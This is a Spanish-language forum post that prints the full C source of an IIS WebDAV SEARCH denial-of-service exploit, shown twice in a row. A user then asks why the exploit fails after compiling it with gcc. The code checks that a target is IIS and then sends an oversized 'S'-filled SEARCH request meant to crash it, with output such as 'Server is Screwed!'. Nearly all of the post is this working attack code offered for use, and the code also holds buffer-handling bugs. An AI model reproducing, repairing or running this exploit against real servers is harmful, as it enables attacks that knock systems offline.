Suscripción al boletín mensual de elhacker.net
Autor
Código:
/*
IIS eXploit. by velan. Greetz to: Shashank Pandey a.k.a +(Neo1)+
Bid: 7735
*/
#define ERROR -1
#define OK 1
#ifdef HAVE_CONFIG_H
#include <config.h>
#endif
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <string.h>
int check_for_iis();
void screw_iis();
void usage();
char IP[15];
int main(int argc, char *argv[])
{
/* cout << "Hello, World!" << endl; */
if(argc !=2)
{
usage(); exit(0);
}
printf("IIS eXploit. by velan. Greetz to: Shashank Pandey a.k.a +(Neo1)+\n");
strcpy(IP, argv[1]);
if(check_for_iis() != OK)
{
printf("Sorry, BAD LUCK! \n"); exit(0);
}
screw_iis();
return EXIT_SUCCESS;
}
int check_for_iis()
{
int sck, flag = 1;
struct sockaddr_in sin;
char req[50];
sck = socket(AF_INET, SOCK_STREAM, 0);
if(sck == ERROR)
{
perror("Socket error "); exit(0);
}
sin.sin_port = htons(80);
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr(IP);
if ((connect(sck, (struct sockaddr *) &sin, sizeof(sin))) == -1)
{
perror("Connect Error "); exit(0);
}
strcpy(req, "GET / HTTP/1.0\r\n\n");
send(sck, req, sizeof(req), 0);
recv(sck, req, sizeof(req), 0);
if (strstr(req,"IIS") == NULL)
{
printf(" Not an IIS server! \n");
flag = 0;
}
sprintf(req,"SEARCH / HTTP/1.0\r\n\n",40);
send(sck, req, sizeof(req), 0);
recv(sck, req, sizeof(req), 0);
if (strstr(req,"HTTP/1.1 411 Length Required") == NULL)
{
printf("METHOD SEARCH NOT ALLOWED. \n");
flag = 0;
}
return(flag);
}
void screw_iis()
{
int sck, flag = 1;
struct sockaddr_in sin;
char junk[100];
char buffer[65535] ="";
char request[80000];
char content[] =
"<?xml version=\"1.0\"?>\r\n"
"<g:searchrequest xmlns:g=\"DAV:\">\r\n"
"<g:sql>\r\n"
"Select \"DAV:displayname\" from scope()\r\n"
"</g:sql>\r\n"
"</g:searchrequest>\r\n";
sck = socket(AF_INET, SOCK_STREAM, 0);
if(sck == ERROR)
{
perror("Socket error "); exit(0);
}
sin.sin_port = htons(80);
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr(IP);
if ((connect(sck, (struct sockaddr *) &sin, sizeof(sin))) == -1)
{
perror("Connect Error "); exit(0);
}
buffer[sizeof(buffer)]=0x00;
memset(buffer,'S',sizeof(buffer));
memset(request,0,sizeof(request));
memset(junk,0,sizeof(junk));
sprintf(request,"SEARCH /%s HTTP/1.1\r\nHost: %s\r\nContent-type: text/xml\r\nCon
tent-Length: ",buffer,IP);
sprintf(request,"%s%d\r\n\r\n",request,strlen(content));
printf("\r\nScrewing the server... \n");
send(sck,request,strlen(request),0);
send(sck,content,strlen(content),0);
recv(sck,junk,sizeof(junk),0);
if(junk[0]==0x00)
{
printf("Server is Screwed! \r\n");
}
else
{
printf("BAD LUCK. Patched.\n");
}
}
void usage()
{
printf("IIS eXploit. by velan. Greetz to: Shashank Pandey a.k.a +(Neo1)+\n");
printf("Usage\r\n");
printf("Screw_IIS <victim IP>\n");
}
IIS eXploit. by velan. Greetz to: Shashank Pandey a.k.a +(Neo1)+
Bid: 7735
*/
#define ERROR -1
#define OK 1
#ifdef HAVE_CONFIG_H
#include <config.h>
#endif
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <string.h>
int check_for_iis();
void screw_iis();
void usage();
char IP[15];
int main(int argc, char *argv[])
{
/* cout << "Hello, World!" << endl; */
if(argc !=2)
{
usage(); exit(0);
}
printf("IIS eXploit. by velan. Greetz to: Shashank Pandey a.k.a +(Neo1)+\n");
strcpy(IP, argv[1]);
if(check_for_iis() != OK)
{
printf("Sorry, BAD LUCK! \n"); exit(0);
}
screw_iis();
return EXIT_SUCCESS;
}
int check_for_iis()
{
int sck, flag = 1;
struct sockaddr_in sin;
char req[50];
sck = socket(AF_INET, SOCK_STREAM, 0);
if(sck == ERROR)
{
perror("Socket error "); exit(0);
}
sin.sin_port = htons(80);
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr(IP);
if ((connect(sck, (struct sockaddr *) &sin, sizeof(sin))) == -1)
{
perror("Connect Error "); exit(0);
}
strcpy(req, "GET / HTTP/1.0\r\n\n");
send(sck, req, sizeof(req), 0);
recv(sck, req, sizeof(req), 0);
if (strstr(req,"IIS") == NULL)
{
printf(" Not an IIS server! \n");
flag = 0;
}
sprintf(req,"SEARCH / HTTP/1.0\r\n\n",40);
send(sck, req, sizeof(req), 0);
recv(sck, req, sizeof(req), 0);
if (strstr(req,"HTTP/1.1 411 Length Required") == NULL)
{
printf("METHOD SEARCH NOT ALLOWED. \n");
flag = 0;
}
return(flag);
}
void screw_iis()
{
int sck, flag = 1;
struct sockaddr_in sin;
char junk[100];
char buffer[65535] ="";
char request[80000];
char content[] =
"<?xml version=\"1.0\"?>\r\n"
"<g:searchrequest xmlns:g=\"DAV:\">\r\n"
"<g:sql>\r\n"
"Select \"DAV:displayname\" from scope()\r\n"
"</g:sql>\r\n"
"</g:searchrequest>\r\n";
sck = socket(AF_INET, SOCK_STREAM, 0);
if(sck == ERROR)
{
perror("Socket error "); exit(0);
}
sin.sin_port = htons(80);
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = inet_addr(IP);
if ((connect(sck, (struct sockaddr *) &sin, sizeof(sin))) == -1)
{
perror("Connect Error "); exit(0);
}
buffer[sizeof(buffer)]=0x00;
memset(buffer,'S',sizeof(buffer));
memset(request,0,sizeof(request));
memset(junk,0,sizeof(junk));
sprintf(request,"SEARCH /%s HTTP/1.1\r\nHost: %s\r\nContent-type: text/xml\r\nCon
tent-Length: ",buffer,IP);
sprintf(request,"%s%d\r\n\r\n",request,strlen(content));
printf("\r\nScrewing the server... \n");
send(sck,request,strlen(request),0);
send(sck,content,strlen(content),0);
recv(sck,junk,sizeof(junk),0);
if(junk[0]==0x00)
{
printf("Server is Screwed! \r\n");
}
else
{
printf("BAD LUCK. Patched.\n");
}
}
void usage()
{
printf("IIS eXploit. by velan. Greetz to: Shashank Pandey a.k.a +(Neo1)+\n");
printf("Usage\r\n");
printf("Screw_IIS <victim IP>\n");
}
En línea
alguien pude ver porque me falla el exploit posteado? lo compile de linux con gcc nombre.c -o nombre aunque probe varios formas, yo creo que el codigo tiene algun error. Alguien probo algun compilador de linux (gcc) para windows?
